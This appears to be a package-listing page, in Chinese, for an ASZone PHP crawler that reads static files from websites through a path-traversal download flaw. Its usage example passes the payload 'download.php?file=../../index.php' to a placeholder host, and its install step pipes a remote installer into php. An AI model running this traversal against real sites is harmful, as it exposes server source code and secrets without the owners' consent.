lenonleite/hacking-analyze-static-files

AsZone 组件 - 爬虫静态文件

v0.2 2016-10-03 04:42 UTC

This package is not auto-updated.

Last update: 2024-09-18 18:37:03 UTC


README

ASZone - 爬虫 - 阅读静态文件

测试版

阅读静态文件是一个开源工具,用于读取静态文件/路径导向

安装

推荐通过Composer来安装 PHP Avenger。

# Install Composer
curl -sS https://getcomposer.org.cn/installer | php

接下来,运行 Composer 命令以安装最新测试版的 Php Avenger SH

php composer.phar require aszone/crawler/download-file-by-lfd

基本用法

$command=array();
$crawler = new DownloadByLocalFileDownload($command);
$url="http://www.xxxx.com/download.php?file=../../index.php";
$crawler->getAllFiles($url);

帮助和文档